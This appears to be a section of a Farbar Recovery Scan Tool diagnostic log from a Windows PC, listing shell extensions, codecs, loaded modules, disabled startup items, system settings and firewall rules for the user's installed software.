 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\FileSyncApi64.dll (Microsoft Corporation -> Microsoft Corporation)
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [DivXShellExtensionItem] -> {48A8A3B0-57E8-4F2B-A49D-19E02B92377B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [DivXShellExtensionItem64] -> {6B49A276-0DBA-43F4-BC96-A841AD11B40B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => c:\program files (x86)\real\realplayer\RPDS\Bin64\rpcloudview.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2012-03-19] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32-x32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32: [vidc.DIVX] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32: [vidc.yv12] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32-x32: [VIDC.LAGS] => lagarith.dll
HKLM\...\Drivers32: [vidc.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [179200 2009-01-25] () [File not signed]
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\Vladana\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"
 
==================== Loaded Modules (Whitelisted) =============
 
2013-05-18 17:25 - 2013-05-18 17:25 - 001350656 _____ ( ) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNGadgetClass\10d2c6adb5906a1d7bbeb75d2a713c07\PFNGadgetClass.ni.dll
2017-09-02 13:47 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2017-09-02 13:47 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2018-06-05 02:08 - 2014-05-19 16:19 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSCreateVC.dll
2018-06-05 02:08 - 2014-10-31 15:40 - 001498112 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\DAQExp.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000113664 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Tasks.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000139776 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Utility.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000758784 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Core.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 001778688 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Ctrls.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000046080 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Localization.dll
2011-12-16 15:37 - 2011-12-16 15:37 - 002437632 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNCommon.dll
2011-12-16 15:38 - 2011-12-16 15:38 - 002246144 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNDevice.dll
2011-12-22 09:03 - 2011-12-22 09:03 - 002281984 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNWLAN.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000421888 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNLocSet\b7cc59ff84258f2c78492c7ef6c33d6e\PFNLocSet.ni.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000473088 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNSwData\9a909070ecd70366e5c577eb52b4bbda\PFNSwData.ni.dll
2012-03-08 12:17 - 2012-03-08 12:17 - 000333312 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\BTHSSupplicant.dll
2012-03-01 10:52 - 2012-03-01 10:52 - 000105472 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\UsR3IoPort.dll
2012-03-29 06:37 - 2012-03-29 06:37 - 000498176 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\P2PSupplicant.dll
2012-04-17 18:35 - 2012-04-17 18:35 - 000168448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\PsRegApi.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000284160 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\TraceApi.dll
2012-04-17 18:36 - 2012-04-17 18:36 - 003280896 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\AmtWsMan.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000102400 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\DbEngine.dll
2012-04-17 18:38 - 2012-04-17 18:38 - 000104448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IntStngs.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000054272 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2012-04-17 18:46 - 2012-04-17 18:46 - 000545792 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\MurocApi.dll
2012-04-17 18:50 - 2012-04-17 18:50 - 000324608 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\panihvint.dll
2012-04-17 18:43 - 2012-04-17 18:43 - 001051136 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\PfMgrApi.dll
2012-04-17 18:51 - 2012-04-17 18:51 - 000178176 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\Ps7ZCfgS.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000020992 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\S24MUDLL.dll
2012-04-17 18:45 - 2012-04-17 18:45 - 002463744 _____ (Intel® Corporation) [File not signed] C:\Windows\System32\IWMSSvc.dll
2006-10-26 13:44 - 2006-10-26 13:44 - 000123904 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\csm.dll
2006-10-26 13:45 - 2006-10-26 13:45 - 000247296 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\msdbg2.dll
2012-04-17 17:52 - 2012-04-17 17:52 - 001830912 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2017-09-02 13:47 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
2018-06-05 02:08 - 2014-10-31 15:41 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSProducstInfo.dll
 
==================== Alternate Data Streams (Whitelisted) ========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:94A19129 [260]
 
==================== Safe Mode (Whitelisted) ==================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer trusted/restricted ==========
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2019-11-09 17:42 - 2019-11-18 19:26 - 000000822 _____ C:\Windows\system32\drivers\etc\hosts
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files (x86)\PC Connectivity Solution\;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x86;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x64;C:\Program Files\Intel\Intel® Management Engine Components\DAL;C:\Program Files\Intel\Intel® Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\QuickTime\QTSystem\
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 0) (EnableLUA: 0)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(If an entry is included in the fixlist, it will be removed.)
 
MSCONFIG\Services: BstHdAndroidSvc => 2
MSCONFIG\Services: BstHdLogRotatorSvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: RealPlayer Cloud Service => 2
MSCONFIG\Services: RealPlayerUpdateSvc => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^RealPlayer Cloud Service UI.lnk => C:\Windows\pss\RealPlayer Cloud Service UI.lnk.CommonStartup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: DivXMediaServer => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
MSCONFIG\startupreg: DivXUpdate => "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
MSCONFIG\startupreg: Google Update => "C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: NSU_agent => "C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe"
MSCONFIG\startupreg: PC Suite Tray => "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RealDownloader => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
MSCONFIG\startupreg: Spotify Web Helper => C:\Users\Vladana\AppData\Roaming\Spotify\SpotifyWebHelper.exe --autostart
MSCONFIG\startupreg: TkBellExe => "c:\program files (x86)\real\realplayer\Update\realsched.exe" -osboot
MSCONFIG\startupreg: Wondershare Helper Compact.exe => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{418A7595-F489-448D-A132-2A9519236EF0}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation-Mobile Wireless Group -> )
FirewallRules: [{B0E6337C-DD13-46CD-A572-58359114E70E}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{5B4B9E35-FBA6-4F36-8798-35D35E29E74B}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{B1CC60A0-4651-4E6D-A4FA-32240C388099}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{A0A9A6FA-AE67-4AB9-B612-32D06F124746}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{CE426DDA-632D-4252-8AF5-B3999BF81124}] => (Allow) C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{CDC85982-754B-4DE3-977B-6E479A26C388}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{F565ACF8-37C4-4665-A110-386DCCDF81E9}] => (Allow) LPort=2869
FirewallRules: [{BA538C52-47F4-4638-88FB-D4E100881E6A}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{838DFD5B-BE28-4A8A-9D48-591EFEF35AB6}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [UDP Query User{7BCDD032-7F97-4FE8-ADB0-130474CDDD9F}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [{DAA4242B-32CB-43E0-B514-40A492583C52}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{87CC937C-627E-4461-A86D-A01FA1D52711}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{787EA532-6389-4D57-8CB4-56ED49F60E38}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [{F0F6824E-F9E8-401C-92A1-52EE1D31841E}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [TCP Query User{BE9D298D-4B00-4F7D-AA02-CE4B8C269C09}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [UDP Query User{010D4FEB-5458-4625-B346-3F087D27F4A3}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [TCP Query User{DF4734DC-C765-4167-986C-24CF01DB1137}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [UDP Query User{E878D949-B0E7-411A-8F5A-335EE806B7C2}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C1202602-2671-439A-8CF4-FFA06CC539FB}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [UDP Query User{3F9714B5-446C-4FD2-91A7-085A9AAF37D8}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [TCP Query User{813FD61F-108E-4C8F-8713-5C5C65A07F20}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{94D1C3B8-E5D6-406D-8550-D0FB1A8AFD18}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{EBCB1A48-8CAD-40A0-97C9-A5E7D1969006}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [UDP Query User{51B1713E-C3DC-4E9B-8B2E-299D5D7EB37D}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [{AD675AD4-8A27-4858-B7BF-64062E576C45}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FF4764D4-F4A6-4C99-B73E-53F8DE61E6F9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{61F7EE47-9BA9-4D47-ADB6-5E48B1DF1F11}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [TCP Query User{9DA426E5-870A-46BA-ACD6-3BECCA6D3981}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{E35C77F8-2476-4F58-B62F-633DD6DA4D7B}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{64ADE5CF-E0E0-432A-ADCA-107CEF11A830}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{29E89790-5F1F-403F-9200-85040488F6BF}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{051C8ED1-8257-4C07-9843-3A321CB1D2B5}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{11E9C41A-BB10-4AE0-86A2-D113F4631726}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{1028E6BB-11FD-426E-9846-980F150B8359}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [UDP Query User{131B9741-3987-48AB-97A9-8EB722A5AD2D}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [{10CC44FD-3D7B-40D9-B4E9-C8B90B3CDA05}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{0F44D93E-8116-4C28-A09E-375525612959}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{DE2D1B1A-A95A-4427-8BD7-97016C528F99}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{023EC48C-AAA6-4832-8DEF-E77068991D61}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{ED5D1E50-0E04-48A8-A0FF-52EBBC8DC18D}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe No File
FirewallRules: [{A9B6A8FC-243F-45C5-B45E-B94CA201DFA7}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{59B2491E-5BF2-4DC5-AE8D-F34BD2AC1230}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{EF33A6D0-D34B-4630-9AE0-D5B6319C642D}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{0C8E4F25-226B-4BC9-BBD0-A6FDD1D99E01}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{E5EC7B01-738D-42B0-960C-4051ADBF6E85}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{28B9FA2D-E66B-453A-9DAB-DDB820A60893}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{2F79B4C8-3AFC-4E30-B1B2-EE4203877302}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{FEE98E1E-A352-4C6D-A55F-F641B4E69F55}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{A16DB9E7-288D-4E5B-BD58-5404E7DED756}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{986F830C-A0F0-4829-A1D3-6E209C9346FE}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{7AB977CD-EA90-4ECA-865F-E3924B0DEBC6}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9FDF76F3-5DF0-4A94-B6C4-F6F10388EEDD}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9E97B312-F759-4491-9B4A-9A7F7BD66B49}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{3B74B220-3059-4A75-949E-50972E487A28}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{187F27A2-9AE2-489B-B927-B8FC03CC268B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{A9130200-545F-467A-9A36-1B798C073847}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{7F1F91ED-8AE2-4EF5-8A6E-42BCE82D179B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{5DEA6D27-54CF-4606-949E-BD3C17E5B786}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [TCP Query User{DF58AEE1-F55F-4C53-ADDB-ACE482856AE1}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{872BEA53-323F-4801-81BF-7FFB853B9696}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{8EB9B601-87D3-4318-8ED9-03D843F1590B}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{597233C9-A6EB-4645-8677-888825AFC9CE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{4077A009-74D8-44BE-AD00-C76EEF7EE5BD}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [{DAE1B584-4569-4BAB-B953-D64ABABDAAD5}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [TCP Query User{3B57E49F-50A7-468F-A210-D44AA14F7EE4}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [UDP Query User{13BD579F-4B71-49B9-9983-2D442B1932E8}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [{CF745F74-D653-4FD3-8D0D-19E40F7120AE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{AB407DB0-7E44-4FFA-A876-AC39F106ECB0}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{6D250D03-52C1-4019-980F-9AC5B16C218B}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [{79C5FF69-9C6C-4795-BBBF-8058548DF184}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C22CAF2C-8CE3-4B0E-B3E7-5A8C676B5F8E}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
